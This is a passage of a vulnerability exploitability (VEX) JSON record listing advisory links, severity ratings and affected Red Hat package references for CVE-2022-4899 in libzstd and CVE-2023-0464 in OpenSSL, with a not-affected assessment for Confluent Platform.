          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188118"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188119"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188120"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188122"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188123"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188124"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188125"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188127"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188128"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188129"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188130"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188131"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188132"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224211"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224212"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224213"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224214"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224215"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224216"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224217"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224219"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224221"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224222"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245014"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245015"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245016"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245017"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245018"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245019"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245020"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245021"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245022"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245023"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245024"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245026"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245027"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245028"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245029"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245030"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245031"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245032"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245033"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245034"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258771"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258772"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258773"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258774"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258775"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258776"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258777"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258778"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258779"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258780"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258781"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258782"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258783"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258784"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258785"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258787"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258788"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258789"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258790"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258791"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258792"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258793"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258794"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21911"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21919"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21920"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21929"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21933"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21935"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21940"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21945"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21946"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21947"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21953"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21955"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21962"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21972"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21976"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21977"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21980"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21982"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22005"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22007"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22008"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22032"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22033"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22038"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22046"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22048"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22053"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22054"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22056"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22057"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22058"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22059"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22064"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22065"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22066"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22068"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22070"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22078"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22079"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22084"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22092"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22097"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22103"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22104"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22110"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22111"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22112"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22113"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22115"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20960"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20961"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20962"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20963"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20968"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20969"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20970"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20971"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20972"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20973"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20974"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20976"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20977"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20978"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20981"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20982"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20983"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20984"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20985"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20993"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21049"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21050"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21051"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21052"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21053"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21055"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21056"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21057"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21061"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21137"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21200"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-1141.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2024:0894"
        },
        {
          "url": "https://github.com/facebook/zstd"
        },
        {
          "url": "https://github.com/facebook/zstd/issues/3200"
        },
        {
          "url": "https://github.com/facebook/zstd/pull/3220"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/zstd/PYSEC-2023-121.yaml"
        },
        {
          "url": "https://github.com/sergey-dryabzhinsky/python-zstd/commit/c8a619aebdbd6b838fbfef6e19325a70f631a4c6"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2022-4899.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-1141.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C63HAGVLQA6FJNDCHR7CNZZL6VSLILB2"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C63HAGVLQA6FJNDCHR7CNZZL6VSLILB2/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JEHRBBYYTPA4DETOM5XAKGCP37NUTLOA"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JEHRBBYYTPA4DETOM5XAKGCP37NUTLOA/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QYLDK6ODVC4LJSDULLX6Q2YHTFOWABCN"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QYLDK6ODVC4LJSDULLX6Q2YHTFOWABCN/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230725-0005"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230725-0005/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-4899"
        }
      ],
      "published": "2023-03-31T20:15:07+00:00",
      "updated": "2026-06-17T05:22:14+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.4.4-1.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2023-0464",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        295
      ],
      "description": "A security vulnerability has been identified in all supported versions\n\nof OpenSSL related to the verification of X.509 certificate chains\nthat include policy constraints.  Attackers may be able to exploit this\nvulnerability by creating a malicious certificate chain that triggers\nexponential use of computational resources, leading to a denial-of-service\n(DoS) attack on affected systems.\n\nPolicy processing is disabled by default but can be enabled by passing\nthe `-policy' argument to the command line utilities or by calling the\n`X509_VERIFY_PARAM_set1_policies()' function.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-0464"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2023:3722"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-0464"
        },
        {
          "url": "https://bugzilla.redhat.com/2181082"
        },
        {
          "url": "https://bugzilla.redhat.com/2182561"
        },
        {
          "url": "https://bugzilla.redhat.com/2182565"
        },
        {
          "url": "https://bugzilla.redhat.com/2188461"
        },
        {
          "url": "https://bugzilla.redhat.com/2207947"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2023-3722.html"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1"
        },
        {
          "url": "https://github.com/advisories/GHSA-w2w6-xp88-5cvw"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-0464.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2023-3722.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464"
        },
        {
          "url": "https://security.gentoo.org/glsa/202402-08"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230406-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230406-0006/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240621-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240621-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6039-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.couchbase.com/alerts"
        },
        {
          "url": "https://www.couchbase.com/alerts/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-0464"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5417"
        },
        {
          "url": "https://www.openssl.org/news/secadv/20230322.txt"
        }
      ],
      "published": "2023-03-22T17:15:13+00:00",
      "updated": "2026-06-17T05:25:36+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
